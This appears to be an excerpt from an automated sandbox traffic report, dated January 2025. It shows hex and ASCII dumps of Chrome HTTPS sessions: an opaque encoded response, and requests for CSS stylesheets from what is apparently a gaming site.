                                                      2025-01-12 23:48:15 UTC16384INData Raw: 36 35 43 6a 7a 6b 46 31 0d 0a 31 66 66 39 0d 0a 34 30 34 71 64 30 2b 65 46 6c 4c 7a 37 54 6b 57 34 6e 56 35 33 43 51 31 34 42 4c 51 46 66 67 73 55 43 44 44 44 2f 4d 49 38 68 2b 32 35 37 66 59 76 64 4e 71 56 4f 4a 6d 77 48 6d 53 45 38 4a 44 52 45 32 50 41 6f 61 62 41 53 61 76 44 58 73 62 4a 33 42 6f 35 44 69 6e 51 62 54 62 37 56 33 74 78 50 41 32 35 4a 49 76 65 66 2b 42 4d 67 4d 66 6e 64 35 70 52 57 51 4c 30 51 63 37 7a 55 77 33 53 51 6a 64 6a 68 6c 78 6f 65 54 74 77 48 6e 7a 59 75 4a 58 43 64 51 35 54 56 59 30 4c 35 6b 6a 62 32 32 63 63 2b 64 79 55 6d 58 65 61 52 62 58 6b 72 74 5a 71 4c 4a 59 4e 48 70 6a 69 32 4f 33 49 77 52 69 65 7a 78 76 68 59 70 4a 50 35 35 76 78 67 52 49 55 38 56 36 45 62 43 74 36 31 55 6b 57 54 76 75 49 62 45 67 7a 76 51 6a 61 70 6f
                                                      Data Ascii: 65CjzkF11ff9404qd0+eFlLz7TkW4nV53CQ14BLQFfgsUCDDD/MI8h+257fYvdNqVOJmwHmSE8JDRE2PAoabASavDXsbJ3Bo5DinQbTb7V3txPA25JIvef+BMgMfnd5pRWQL0Qc7zUw3SQjdjhlxoeTtwHnzYuJXCdQ5TVY0L5kjb22cc+dyUmXeaRbXkrtZqLJYNHpji2O3IwRiezxvhYpJP55vxgRIU8V6EbCt61UkWTvuIbEgzvQjapo
                                                      2025-01-12 23:48:15 UTC16384INData Raw: 47 57 2f 57 53 41 36 30 45 43 37 68 39 4f 4e 37 7a 70 59 49 6b 4e 75 70 30 41 6d 6a 41 34 56 37 4d 4a 32 76 6d 70 70 54 49 64 6a 4e 64 59 2f 68 4d 4d 73 56 44 45 6b 45 66 47 41 6e 44 32 41 31 7a 74 78 2b 6f 6a 6c 4d 66 42 75 48 56 49 67 31 30 67 59 37 6a 4d 30 58 64 2f 35 62 33 61 75 51 4f 31 67 55 46 41 45 4b 2f 73 37 31 77 49 77 53 51 75 71 45 6f 70 56 6a 30 73 35 4e 4f 59 44 66 2b 49 6b 55 71 31 6e 65 5a 4e 61 75 38 31 4a 58 2f 49 77 41 6a 43 6d 6a 2b 4c 7a 79 56 32 4a 56 32 30 62 51 4c 70 4a 4f 35 50 30 6b 49 4c 68 48 65 37 54 42 71 46 49 4b 45 72 6f 41 41 62 35 69 70 71 70 2b 59 37 68 68 71 74 71 7a 67 59 75 2f 38 42 47 74 4a 69 68 79 43 76 45 47 77 54 39 72 38 76 51 37 39 43 42 68 66 6b 42 6a 7a 53 43 68 51 30 49 64 39 36 79 72 30 6f 30 4d 5a 36 4a
                                                      Data Ascii: GW/WSA60EC7h9ON7zpYIkNup0AmjA4V7MJ2vmppTIdjNdY/hMMsVDEkEfGAnD2A1ztx+ojlMfBuHVIg10gY7jM0Xd/5b3auQO1gUFAEK/s71wIwSQuqEopVj0s5NOYDf+IkUq1neZNau81JX/IwAjCmj+LzyV2JV20bQLpJO5P0kILhHe7TBqFIKEroAAb5ipqp+Y7hhqtqzgYu/8BGtJihyCvEGwT9r8vQ79CBhfkBjzSChQ0Id96yr0o0MZ6J
                                                      2025-01-12 23:48:15 UTC16384INData Raw: 52 49 61 4c 37 50 37 7a 46 4d 66 36 2f 4c 72 6c 49 6f 50 6c 6f 4d 78 55 4b 4b 74 41 64 31 7a 32 64 54 2f 42 6f 51 61 36 6e 41 6b 49 37 6a 49 42 52 43 33 63 64 47 62 34 59 6e 42 67 4d 51 4d 4f 41 34 55 6a 54 70 33 73 6d 72 59 76 67 4c 31 42 32 45 4a 63 6e 41 67 6d 33 43 4f 2f 74 4a 48 57 35 70 35 30 4b 56 75 32 75 74 55 71 74 55 65 71 50 35 34 69 42 69 31 61 50 71 51 4b 4a 38 2b 66 6b 79 59 59 6d 34 54 32 67 71 44 69 51 30 4e 35 45 61 43 72 64 71 54 43 50 69 72 2f 43 39 4b 48 48 58 4e 58 54 58 41 38 4a 62 70 6c 6b 41 6c 39 39 48 66 53 32 33 5a 31 6b 77 38 68 6d 6a 58 68 64 4b 6a 72 63 6c 4c 6a 73 4b 52 39 73 76 50 73 6c 46 72 2f 61 45 2f 56 35 66 4d 54 2b 53 6e 45 6c 50 68 5a 6d 72 7a 6d 65 6d 75 47 2b 45 52 74 48 37 42 6d 6c 67 62 41 64 57 44 54 43 6e 71
                                                      Data Ascii: RIaL7P7zFMf6/LrlIoPloMxUKKtAd1z2dT/BoQa6nAkI7jIBRC3cdGb4YnBgMQMOA4UjTp3smrYvgL1B2EJcnAgm3CO/tJHW5p50KVu2utUqtUeqP54iBi1aPqQKJ8+fkyYYm4T2gqDiQ0N5EaCrdqTCPir/C9KHHXNXTXA8JbplkAl99HfS23Z1kw8hmjXhdKjrclLjsKR9svPslFr/aE/V5fMT+SnElPhZmrzmemuG+ERtH7BmlgbAdWDTCnq
                                                      2025-01-12 23:48:15 UTC16384INData Raw: 0d 0a 31 66 66 38 0d 0a 74 33 6f 4e 4e 41 4f 2f 7a 34 44 4f 65 34 54 4b 52 45 47 61 52 6d 43 68 58 45 38 74 53 2b 4e 51 79 5a 77 78 4b 6d 55 61 62 6c 34 38 42 4d 78 51 66 73 47 46 69 32 4a 30 4b 6f 64 38 30 44 48 77 79 2f 6f 6e 55 54 64 4a 42 55 69 63 47 4d 61 33 69 69 77 6d 4c 46 6e 76 73 7a 5a 4b 4a 59 6a 4b 42 37 4e 55 77 62 2b 4b 68 42 78 53 42 33 67 77 56 33 64 72 2f 4b 5a 48 49 44 77 53 31 54 58 44 77 38 41 63 76 32 68 72 65 56 6d 38 39 4b 65 33 6d 57 4a 4b 49 63 35 4c 43 38 38 6f 6c 69 75 4b 56 2f 4b 47 35 76 69 6c 76 69 43 2b 52 6e 47 5a 6d 53 35 6d 64 2b 30 6e 42 64 41 56 62 69 6b 69 57 63 71 35 56 7a 63 39 52 7a 4a 6e 65 39 38 35 56 41 4d 2b 75 54 78 50 66 38 4f 54 2f 74 74 31 44 43 50 44 71 56 49 61 30 51 70 54 75 50 77 69 62 61 58 50 72 4b 31
                                                      Data Ascii: 1ff8t3oNNAO/z4DOe4TKREGaRmChXE8tS+NQyZwxKmUabl48BMxQfsGFi2J0Kod80DHwy/onUTdJBUicGMa3iiwmLFnvszZKJYjKB7NUwb+KhBxSB3gwV3dr/KZHIDwS1TXDw8Acv2hreVm89Ke3mWJKIc5LC88oliuKV/KG5vilviC+RnGZmS5md+0nBdAVbikiWcq5Vzc9RzJne985VAM+uTxPf8OT/tt1DCPDqVIa0QpTuPwibaXPrK1
                                                      2025-01-12 23:48:15 UTC16384INData Raw: 0d 0a 31 66 66 38 0d 0a 34 50 33 72 63 44 4b 5a 50 4d 4d 41 56 79 4a 45 34 72 67 52 49 59 42 65 62 31 39 65 66 33 4b 52 4c 2b 4d 73 77 46 47 5a 4b 50 47 59 79 4d 58 30 41 55 51 4b 30 2b 73 77 46 2b 78 4c 5a 6d 33 34 65 38 4d 70 59 75 76 74 42 71 49 54 4d 73 76 69 67 50 5a 75 52 47 37 75 2b 4e 35 62 30 4a 6d 6f 4a 72 75 4c 45 4e 59 51 63 77 56 56 31 33 65 69 2f 33 32 47 57 35 32 69 43 47 6c 43 58 76 61 69 6b 75 51 6c 64 2b 45 4d 52 6c 49 68 6f 31 33 75 4c 37 48 4f 6b 72 38 4f 57 65 72 70 4c 43 72 57 62 36 56 77 79 4a 4e 43 48 51 4f 4d 6f 42 36 6f 46 4e 64 61 47 41 58 46 39 43 31 43 68 69 57 63 77 49 32 7a 30 30 36 4c 35 77 56 79 52 43 78 65 68 78 6a 64 31 41 43 34 76 4f 4d 73 68 64 34 79 7a 72 6e 63 7a 66 36 4a 61 48 4b 58 6f 37 55 59 34 50 6a 68 2f 54 38
                                                      Data Ascii: 1ff84P3rcDKZPMMAVyJE4rgRIYBeb19ef3KRL+MswFGZKPGYyMX0AUQK0+swF+xLZm34e8MpYuvtBqITMsvigPZuRG7u+N5b0JmoJruLENYQcwVV13ei/32GW52iCGlCXvaikuQld+EMRlIho13uL7HOkr8OWerpLCrWb6VwyJNCHQOMoB6oFNdaGAXF9C1ChiWcwI2z006L5wVyRCxehxjd1AC4vOMshd4yzrnczf6JaHKXo7UY4Pjh/T8
                                                      2025-01-12 23:48:15 UTC16384INData Raw: 0d 0a 63 36 34 35 0d 0a 45 6b 35 2b 35 67 6c 59 31 32 76 58 6d 32 49 4f 70 6c 38 43 48 7a 6e 7a 4f 6d 49 4f 34 41 42 79 36 75 62 2b 48 4b 65 43 42 39 4f 6c 78 79 38 71 44 48 37 52 4e 43 6b 78 4d 37 72 63 34 38 62 64 4e 38 33 51 4b 68 78 4a 75 79 37 6a 2b 2f 79 57 52 47 6a 35 57 4c 78 51 6d 39 53 35 55 70 4e 49 56 73 63 4e 51 31 6d 4c 68 6c 5a 70 6b 31 2b 65 56 44 6c 77 38 2b 6d 4f 78 74 36 73 4f 55 76 4b 66 6f 6d 6c 73 31 38 67 34 49 44 76 4d 66 37 30 2f 52 47 37 67 51 35 58 6d 2b 4d 67 30 79 7a 38 6f 58 66 30 49 61 32 69 65 47 36 64 62 30 76 6a 50 67 63 63 4d 51 55 71 45 5a 42 53 68 39 4b 75 6f 59 5a 78 33 6b 61 65 32 6f 43 76 74 73 41 54 6e 4d 34 4b 34 72 69 79 64 2f 52 59 67 38 6e 62 4c 63 49 74 42 71 36 4a 4d 4c 53 35 34 30 41 39 48 30 34 44 32 31 70
                                                      Data Ascii: c645Ek5+5glY12vXm2IOpl8CHznzOmIO4ABy6ub+HKeCB9Olxy8qDH7RNCkxM7rc48bdN83QKhxJuy7j+/yWRGj5WLxQm9S5UpNIVscNQ1mLhlZpk1+eVDlw8+mOxt6sOUvKfomls18g4IDvMf70/RG7gQ5Xm+Mg0yz8oXf0Ia2ieG6db0vjPgccMQUqEZBSh9KuoYZx3kae2oCvtsATnM4K4riyd/RYg8nbLcItBq6JMLS540A9H04D21p


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      138192.168.2.44989320.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:16 UTC571OUTGET /plus/css/unite/egame_unite.css?ver=1658200755 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:17 UTC305INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:16 GMT
                                                      Content-Type: text/css
                                                      Content-Length: 38713
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 19 Jul 2022 03:19:15 GMT
                                                      ETag: "62d622b3-9739"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: MISS
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:17 UTC3791INData Raw: 40 63 68 61 72 73 65 74 20 22 75 74 66 2d 38 22 3b 0a 2f 2a 6c 6f 61 64 69 6e 67 2a 2f 0a 2e 6e 6f 5f 73 65 61 72 63 68 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 20 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 36 70 78 3b 0a 7d 0a 23 67 61 6d 65 5f 6c 69 73 74 7b 0a 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 35 30 30 70 78 3b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 5f 70 61 63 6d 61 6e 5f 68 61 6c 66 5f 75 70 20 7b 0a 20 20 30 25 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 32 37 30 64
                                                      Data Ascii: @charset "utf-8";/*loading*/.no_search{ padding: 20px 0; font-size: 26px;}#game_list{ min-height: 500px; position: relative; overflow-x: hidden;}@-webkit-keyframes rotate_pacman_half_up { 0% { -webkit-transform: rotate(270d
                                                      2025-01-12 23:48:17 UTC4096INData Raw: 69 64 74 68 3a 20 31 30 70 78 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 70 78 3b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 30 2c 20 2d 36 2e 32 35 70 78 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 30 2c 20 2d 36 2e 32 35 70 78 29 3b 0a 20 20 20 20 74 6f 70 3a 20 32 35 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 37 30 70 78 3b 20 7d 0a 0a 2f 2a 20 e5 9f ba e6 9c ac e8 ae be e5 ae 9a 20 2a 2f 0a 2e 63 6f 6e 74 65 6e 74 7b 20 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 7d 0a 2e 74 6f 5f 62
                                                      Data Ascii: idth: 10px; height: 10px; position: absolute; -webkit-transform: translate(0, -6.25px); transform: translate(0, -6.25px); top: 25px; left: 70px; }/* */.content{ color: #666; background-color: #191919;}.to_b
                                                      2025-01-12 23:48:17 UTC4096INData Raw: 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 30 25 29 3b 2a 2f 0a 7d 0a 2e 63 6f 6e 74 65 6e 74 5f 6d 67 20 6c 69 2e 66 69 6c 74 65 72 5f 70 6c 61 74 66 6f 72 6d 2c 0a 2e 63 6f 6e 74 65 6e 74 5f 70 74 20 6c 69 2e 66 69 6c 74 65 72 5f 70 6c 61 74 66 6f 72 6d 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 0a 7d 0a 0a 2f 2a 20 63 61 74 5f 6d 65 6e 75 5f 75 6e 69 74 65 20 e5 88 86 e7 b1 bb e5 88 97 e8 a1 a8 20 2a 2f 0a 2e 63 61 74 5f 6d 65 6e 75 5f 75 6e 69 74 65 20 75 6c 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 7d 0a 2e
                                                      Data Ascii: ransform: translateY(-50%); transform: translateY(-50%);*/}.content_mg li.filter_platform,.content_pt li.filter_platform{ display:none;}/* cat_menu_unite */.cat_menu_unite ul{ display: flex; flex-wrap: wrap;}.
                                                      2025-01-12 23:48:17 UTC4096INData Raw: 20 20 62 6f 72 64 65 72 3a 20 31 30 70 78 20 73 6f 6c 69 64 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 6c 65 66 74 3a 6e 6f 6e 65 3b 0a 7d 0a 2e 74 79 70 65 31 2e 70 6f 64 6c 6f 61 64 65 72 5f 75 6e 69 74 65 20 6c 69 3a 68 6f 76 65 72 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 69 6c 74 65 72 3a 20 62 72 69 67 68 74 6e 65 73 73 28 31 2e 32 29 3b 0a 20 20 20 20 66 69 6c 74 65 72 3a 20 62 72 69 67 68 74 6e 65 73 73 28 31 2e 32 29 3b 0a 7d 0a 2e 74 79 70 65 31 2e 70 6f 64 6c 6f 61 64 65 72 5f 75 6e 69 74 65 20 6c 69 2e 61 63 74 69 76 65 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 37 34 31 32 66 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 38 64 66 34 64 65 3b 0a 7d 0a 2e 74 79 70 65 31 2e 70 6f 64 6c 6f 61 64
                                                      Data Ascii: border: 10px solid #191919; border-left:none;}.type1.podloader_unite li:hover{ -webkit-filter: brightness(1.2); filter: brightness(1.2);}.type1.podloader_unite li.active{ background-color: #07412f; color:#8df4de;}.type1.podload
                                                      2025-01-12 23:48:17 UTC4096INData Raw: 69 6f 6e 2d 79 3a 20 2d 32 30 30 70 78 3b 7d 0a 2e 74 79 70 65 31 2e 63 61 74 5f 6d 65 6e 75 5f 75 6e 69 74 65 20 6c 69 5b 64 61 74 61 2d 63 61 74 69 64 3d 22 38 30 35 22 5d 20 2e 69 63 6f 6e 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 20 2d 32 35 30 70 78 3b 7d 0a 2e 74 79 70 65 31 2e 63 61 74 5f 6d 65 6e 75 5f 75 6e 69 74 65 20 6c 69 5b 64 61 74 61 2d 63 61 74 69 64 3d 22 38 30 36 22 5d 20 2e 69 63 6f 6e 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 20 2d 33 30 30 70 78 3b 7d 0a 2e 74 79 70 65 31 2e 63 61 74 5f 6d 65 6e 75 5f 75 6e 69 74 65 20 6c 69 5b 64 61 74 61 2d 63 61 74 69 64 3d 22 38 30 37 22 5d 20 2e 69 63 6f 6e 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 20 2d 33
                                                      Data Ascii: ion-y: -200px;}.type1.cat_menu_unite li[data-catid="805"] .icon{ background-position-y: -250px;}.type1.cat_menu_unite li[data-catid="806"] .icon{ background-position-y: -300px;}.type1.cat_menu_unite li[data-catid="807"] .icon{ background-position-y: -3
                                                      2025-01-12 23:48:17 UTC4096INData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 65 67 61 6d 65 5f 70 74 2e 74 79 70 65 31 20 42 e7 ab 99 20 31 33 36 5f 50 54 e8 ae be e5 ae 9a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0a 2f 2a 20 e4 b8 8a e6 96 b9 e8 bc aa e6 92 ad 20 2a 2f 0a 2e 64 69 76 53 75 62 48 65 61 64 65 72 57 72 61 70 70 65 72 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 7d 0a 2e 64 69 76 53 75 62 48 65 61 64 65 72 57 72 61 70 70 65 72 20 2e 6e 61 76 69 67 61 74 69 6f 6e 2c 0a 2e 65 67 61 6d 65 5f 70 74 5f 73 6c 69 64 65 5f 75 6e 69 74 65 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 77 69 64
                                                      Data Ascii: --------------- egame_pt.type1 B 136_PT -----------------------------*//* */.divSubHeaderWrapper { width: 100%; background-color: #000;}.divSubHeaderWrapper .navigation,.egame_pt_slide_unite { margin: 0 auto; wid
                                                      2025-01-12 23:48:17 UTC4096INData Raw: 72 20 2e 50 6f 64 49 6d 61 67 65 20 69 6d 67 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 2e 31 29 3b 0a 7d 0a 2e 65 67 61 6d 65 5f 70 74 20 2e 74 79 70 65 31 2e 67 61 6d 65 5f 6c 69 73 74 5f 75 6e 69 74 65 20 2e 47 61 6d 65 73 50 6f 64 20 2e 50 6f 64 54 65 78 74 57 72 61 70 70 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 7d 0a 2e 65 67 61 6d 65 5f 70 74 20 2e 74 79 70 65 31 2e 67 61 6d 65 5f 6c 69 73 74 5f 75 6e 69 74 65 20 2e 50 6f 64 54 65 78 74 57 72 61 70 70 65 72 20 2e 73 6c 69 64 65 72 2d
                                                      Data Ascii: r .PodImage img{ transform: scale(1.1);}.egame_pt .type1.game_list_unite .GamesPod .PodTextWrapper { position: relative; max-height: 100%; padding: 0px; font-weight: normal;}.egame_pt .type1.game_list_unite .PodTextWrapper .slider-
                                                      2025-01-12 23:48:17 UTC4096INData Raw: 72 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 7d 0a 2e 67 61 6d 65 5f 66 69 6c 74 65 72 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 35 70 78 20 61 75 74 6f 3b 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 37 30 70 78 3b 0a 7d 0a 2e 67 61 6d 65 5f 66 69 6c 74 65 72 20 3e 20 61 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a
                                                      Data Ascii: r *{box-sizing: border-box;}.game_filter{ color: #fff; font-size: 1.2em; margin: 15px auto; max-width: 1270px;}.game_filter > a{ color: #333; cursor: pointer; display: flex; font-family: 'Microsoft YaHei'; font-size:
                                                      2025-01-12 23:48:17 UTC4096INData Raw: 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 36 29 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 3b 0a 7d 0a 0a 2f 2a 20 2d 2d 2d 2d 2d 20 6d 6f 64 65 31 20 6d 6f 64 65 32 20 e5 85 b1 e9 80 9a 20 73 74 61 72 74 2d 2d 2d 2d 2d 20 2a 2f 0a 2e 65 67 61 6d 65 5f 72 65 63 6f 6d 6d 65 6e 64 5f 75 6e 69 74 65 20 2e 74 69 74 6c 65 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 30 3b 0a 20 20 20 20 6c 65 66 74 3a 30 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 34 25 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 62 6f 72
                                                      Data Ascii: 5, 255, 255, 0.6); border-radius: 10px;}/* ----- mode1 mode2 start----- */.egame_recommend_unite .title{ position: absolute; top:0; left:0; display: block; box-sizing: border-box; width: 4%; height: 100%; bor
                                                      2025-01-12 23:48:17 UTC2154INData Raw: 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 39 30 64 65 67 29 3b 0a 7d 0a 2f 2a 20 2d 2d 2d 2d 2d 20 73 77 69 70 65 72 e6 8c 89 e9 88 95 e8 a8 ad e5 ae 9a 20 2d 2d 2d 2d 2d 20 65 6e 64 20 2a 2f 0a 0a 2f 2a 20 3d 3d 3d 3d 3d 3d 20 e7 94 b5 e5 ad 90 e7 83 ad e9 97 a8 e6 b8 b8 e6 88 8f e6 8e a8 e8 8d 90 20 65 6e 64 20 3d 3d 3d 3d 3d 3d 20 2a 2f 0a 0a 0a 0a 2f 2a 20 3d 3d 3d 3d 3d 3d 20 e8 8b b1 e6 96 87 e7 89 88 e9 9d a2 e8 b0 83 e6 95 b4 20 73 74 61 72 74 20 3d 3d 3d 3d 3d 3d 20 2a 2f 0a 2e 65 6e 20 2e 73 65 61 72 63 68 5f 75 6e 69 74 65 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 31 32 30 70 78 3b 0a 7d 0a 2e 65 6e 20 2e 63 61 74 5f 6d 65 6e 75 5f 75 6e 69 74 65 20 2b 20 2e 67 61 6d 65 5f 66 69 6c 74 65 72 20 3e 20 61 20
                                                      Data Ascii: transform: rotate(90deg);}/* ----- swiper ----- end *//* ====== end ====== *//* ====== start ====== */.en .search_unite{ margin-right: 120px;}.en .cat_menu_unite + .game_filter > a


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      139192.168.2.44989220.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:16 UTC573OUTGET /plus/css/custom/egame_custom.css?ver=1736392866 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:17 UTC305INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:16 GMT
                                                      Content-Type: text/css
                                                      Content-Length: 13576
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Thu, 09 Jan 2025 03:21:06 GMT
                                                      ETag: "677f40a2-3508"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: MISS
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:17 UTC3791INData Raw: 40 63 68 61 72 73 65 74 20 22 75 74 66 2d 38 22 3b 0a 2e 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 30 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 75 6e 73 65 74 3b 0a 7d 0a 2e 67 61 6d 65 70 6c 61 74 66 6f 72 6d 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 37 32 37 32 37 3b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 33 36 33 36 33 36 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 20 20 20 20 6d 61 72
                                                      Data Ascii: @charset "utf-8";.content { display: flex; width: 1000px; margin: 0 auto; color: #FFF; background-color: unset;}.gameplatform { width: 100%; background: #272727; border: 1px solid #363636; border-radius: 5px; mar
